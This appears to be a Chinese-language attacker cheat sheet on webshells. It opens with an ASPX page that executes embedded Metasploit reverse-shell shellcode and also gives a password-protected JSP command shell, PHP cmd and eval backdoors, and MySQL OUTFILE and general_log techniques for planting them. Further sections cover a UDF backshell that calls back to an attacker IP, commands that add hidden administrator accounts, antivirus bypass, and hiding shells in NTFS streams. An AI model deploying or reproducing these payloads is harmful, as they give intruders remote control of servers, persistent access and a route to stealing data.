shellcode.aspx
<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %> <%@ Import Namespace="System" %> <%@ Import Namespace="System.Runtime.InteropServices" %> <script runat="server"> delegate int MsfpayloadProc(); protected void Page_Load(object sender, EventArgs e) { byte[] codeBytes = { //msfpayload windows/shell_reverse_tcp LHOST=192.168.1.115 LPORT=53 X C 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89, 0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b, 0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28, 0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c, 0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d, 0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52, 0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78, 0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20, 0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49, 0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac, 0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75, 0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75, 0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66, 0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3, 0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff, 0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d, 0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77, 0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26, 0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00, 0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b, 0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40, 0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0, 0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8, 0x01,0x73,0x68,0x02,0x00,0x00,0x35,0x89, 0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5, 0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c, 0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5, 0xa2,0x56,0xff,0xd5,0x68,0x63,0x6d,0x64, 0x00,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6, 0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7, 0x44,0x24,0x3c,0x01,0x01,0x8d,0x44,0x24, 0x10,0xc6,0x00,0x44,0x54,0x50,0x56,0x56, 0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56, 0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89, 0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08, 0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5, 0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff, 0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0, 0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a, 0x00,0x53,0xff,0xd5 }; IntPtr handle = IntPtr.Zero; handle = VirtualAlloc( IntPtr.Zero, codeBytes.Length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); try { Marshal.Copy(codeBytes, 0, handle, codeBytes.Length); MsfpayloadProc msfpayload = Marshal.GetDelegateForFunctionPointer(handle, typeof(MsfpayloadProc)) as MsfpayloadProc; msfpayload(); } finally { VirtualFree(handle, 0, MEM_RELEASE); } } //Windows API [DllImport("Kernel32.dll", EntryPoint = "VirtualAlloc")] public static extern IntPtr VirtualAlloc(IntPtr address, int size, uint allocType, uint protect); [DllImport("Kernel32.dll", EntryPoint = "VirtualFree")] public static extern bool VirtualFree(IntPtr address, int size, uint freeType); //flags const uint MEM_COMMIT = 0x1000; const uint MEM_RESERVE = 0x2000; const uint PAGE_EXECUTE_READWRITE = 0x40; const uint MEM_RELEASE = 0x8000; </script>
1 DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV 2 OPTION=S3WYOSWLBSGr 3 currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 4 CREATEDATE=wUghPB3szB3Xwg66 5 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 6 originalFileId=wV66 7 originalCreateDate=wUghPB3szB3Xwg66 8 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 9 needReadFile=yRWZdAS6 10 originalCreateDate=wLSGP4oEzLKAz4=iz=66 11 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%> 12 <%! 13 public static String excuteCmd(String c) { 14 15 StringBuilder line = new StringBuilder(); 16 17 try 18 { 19 Process pro = Runtime.getRuntime().exec(c); 20 BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream())); 21 String temp = null; 22 while ((temp = buf.readLine()) != null) {line.append(temp+"\n");} 23 buf.close(); 24 } 25 catch (Exception e) 26 { 27 line.append(e.getMessage()); 28 } 29 return line.toString(); 30 } 31 %> 32 33 <% 34 if 35 ("asasd33445".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))) 36 { 37 out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>"); 38 } 39 else 40 {out.println(":-)");} 41 %> 42 6e4f045d4b8506bf492ada7e3390d7ce
PHP 绕过写入WebShell - 死亡exit
<?php $content = '<?php exit; ?>'; $content .= $_POST['txt']; file_put_contents($_POST['filename'], $content);
cmd形式WebShell
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; // die; } ?>
Webshell - 利用
(1)站长工具 Webshell被站长常常用于网站管理、服务器管理等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。 (2)持续远程访问 入侵者可以利用从而达到长期控制网站服务器的目的,若攻击者自行修复了漏洞,以确保没有其他人会利用该漏洞,攻击者可以低调的随时控制服务器。一些流行的webshell使用密码验证和其他技术来确保只有上传webshell的攻击者才能访问它。(webshell密码爆破工具表示不服) (3)权限提升 在服务器没有配置错误的情况下,webshell将在web服务器的用户权限下运行,该用户权限是有限的。通过使用webshell,攻击者可以尝试通过利用系统上的本地漏洞来执行权限提升,常见的有查找敏感配置文件、通过内核漏洞提权、利用低权限用户目录下可被Root权限用户调用的脚本提权、任务计划等(从入门到放弃) (4)极强的隐蔽性 有些恶意网页脚本可以嵌套在正常网页中运行,且不容易被查杀。webshell还可以穿越服务器防火墙,由于与被控制的服务器或远程主机交互的数据都是通过80端口传递,因此不会被防火墙拦截,在没有记录流量的情况下,webshell使用post包发送,也不会被记录在系统日志中,只会在web日志中记录一些数据提交的记录。
WebShell - 检测
https://www.freebuf.com/articles/web/183520.html
Mysql写入Webshell
一句话 Select '<?php eval($_POST[cmd])?>' into outfile '物理路径'; and 1=2 union all select 一句话HEX值 into outfile '路径'; 表形式 CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL ); INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>'); SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE '路径'; DROP TABLE IF EXISTS `darkmoon`;
phpmyadmin root账号获取Webshell
1.直接读取后门文件 通过程序报错、phpinfo函数、程序配置表等直接获取网站真实路径,有些网站前期已经被人渗透过,因此在目录下留有后门文件通过load_file直接读取。 2.直接导出一句话后门 前提需要知道网站的真实物理路径,例如呼求偶真实路径D:\work\WWW,则可以通过执行以下查询,来获取一句话后门文件cmd.php,访问地址 http://www.somesite.com/cmd.php select '<?php @eval($_POST[antian365]);?>'INTO OUTFILE 'D:/work/WWW/antian365.php' 3.创建数据库导出一句话后门 在查询窗口直接执行以下代码即可,跟2.原理类似。 CREATE TABLE `mysql`.`antian365` (`temp` TEXT NOTNULL ); INSERT INTO `mysql`.`antian365` (`temp` ) VALUES('<?php @eval($_POST[antian365]);?>'); SELECT `temp` FROM `antian365` INTO OUTFILE'D:/www/antian365.php'; DROP TABLE IF EXISTS `antian365`; 4.可执行命令方式 创建执行命令形式的shell,但前提是对方未关闭系统函数。该方法导出成功后可以直接执行DOS命令,使用方法:www.xxx.com/antian365.php?cmd=(cmd=后面直接执行dos命令)。 select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/antian365.php' 另外在linux下可以导出直接执行命令的shell: SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'; http://localhost/shell.php?c=cat%20/etc/passwd 5.过杀毒软件方式 通过后台或者存在上传图片的地方,上传图片publicguide.jpg,内容如下: <?php $a=' PD9waHAgQGV2YWwoJF9QT1NUWyd hbnRpYW4zNjUnXSk7ZGllKCk7Pz4= '; error_reporting(0); 6.修改mysql.txt Mysql.txt为udf.dll的二进制文件转成十六进制代码。 (1)先执行导入ghost表中的内容 修改以下代码的末尾代码 select backshell(“YourIP”,4444); (2)导出文件到某个目录 select data from Ghost into dumpfile 'c:/windows/mysqldll.dll'; select data from Ghost into dumpfile 'c:/windows/system32/mysqldll'; select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/mysqldll'; select data from Ghost into dumpfile 'E:/PHPnow-1.5.6/MySQL-5.0.90/lib/plugin/mysqldll'; select data from Ghost into dumpfile 'C:/websoft/MySQL/MySQL Server 5.5/lib/plugin/mysqldll.dll' select data from Ghost into dumpfile 'D:/phpStudy/MySQL/lib/plugin/mysqldll.dll'; select load_file('C:/ProgramData/MySQL/ MySQL Server 5.1/Data/mysql/user.frm'); select data from Ghost into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib/plugin/mysqldll.dll' (3)查看FUNCTION中是否存在cmdshell和backshell 存在则删除: drop FUNCTION cmdshell;//删除cmdshell drop FUNCTION backshell;//删除backshell 创建backshell: CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll'; //创建backshell 在具备独立主机的服务器上执行监听: nc -vv -l -p 44444 执行查询: select backshell(""192.192.192.1"",44444);//修改192.192.192.1为你的IP和端口 4.获取webshell后添加用户命令 注意如果不能直接执行,则需要到c:\windows\system32\下执行 net user antian365 www.xianzhi.aliyun.com /add net localgroup administrators antian365 @set_time_limit(0); eval(""?>"".base64_decode($a)); ?> 然后通过图片包含temp.php,导出webshell。 select '<?php include 'publicguide.jpg' ?>'INTO OUTFILE 'D:/work/WWW/antian365.php' 一句话后门密码:antian365 6.直接导出加密webshell 一句话后门文件密码:pp64mqa2x1rnw68,执行以下查询直接导出加密webshell,D:/WEB/IPTEST/22.php,注意在实际过程需要修改D:/WEB/IPTEST/22.php。 注意: 也可以使用 http://tool.lu/hexstr/ 网站的代码转换来实现,将需要导出的文件代码复制到网站的字符串中,通过字符串转成十六进制,将十六进制字符串放入unhex函数进行查询即可: select unhex('十六进制字符串') into dumpfile 'D:/WEB/shell.php' 7.CMS系统获取webshell 有些情况下无法获取网站的真实路径,则意味着无法直接导出一句话webshell,可以通过CMS系统管理账号登录系统后,寻找漏洞来突破,例如dedecms则可以通过破解管理员账号后直接上传文件来获取webshell。Discuz!的UC_key可以直接获取webshell。甚至某些系统可以直接上传php文件。下面是一些CMS系统渗透的技巧: dedecms系统的密码有直接md5,也有20位的密码,如果是20位的密码则需要去掉密码中的前3位和最后1位,然后对剩余的值进行md5解密即可; phpcms v9版本的密码需要加salt进行破解,需要选择破解算法md5(md5($pass).$salt)进行破解。 Discuz!论坛帐号保存在ucenter_members(Discuz7.X及以上版本)或者cdb_members(discuz6.x版本)表中,其破解需要带salt进行,其破解时是使用password:salt进行,例如a0513df9929afc972f024fa4e586e829:399793。 8.general_log_file获取webshell (1)查看genera文件配置情况 show global variables like ""%genera%""; (2)关闭general_log set global general_log=off; (3)通过general_log选项来获取webshell set global general_log='on'; SET global general_log_file='D:/phpStudy/WWW/cmd.php'; 在查询中执行语句: SELECT '<?php assert($_POST[""cmd""]);?>'; Shell为cmd.php,一句话后门,密码为cmd。
后门生成工具
evil kali可装 ew http://rootkiter.com/EarthWorm http://rootkiter.com/Termite/ --后者新版" nc lcx netsh --windows msf
bypass360 http://lu4n.com/metasploit-payload-bypass-av-note/ http://hacktech.cn/2017/04/20/msf-AntiVirus.html"
MSSQL写入Webshell
echo ^<?php @eval(request[xxx])? ^^>^ >路径
WebShell查杀
安全狗
Freebuf
D盾
青藤云
WebShell隐藏 - Windows
NTFS中的ADS(交换数据流)
select 'xxx' into outfile 'D:\\mysql\\lib::$INDEX_ALLOCATION';
echo ^<?php @eval(request[xxx])? ^>> index.php:a.jpg
驱动隐藏
系统保留文件名
畸形文件夹
属性隐藏
Linux终端解析“\r”
不死马
ASPX编译dll
添加用户并并隐藏 - powershell
RDP记录获取 - powershell - https://rcoil.me/
安装后门
https://github.com/tom0li/security_circle/blob/master/15288418585142.md --基于bash
https://github.com/deepzec/Grok-backdoor --基于python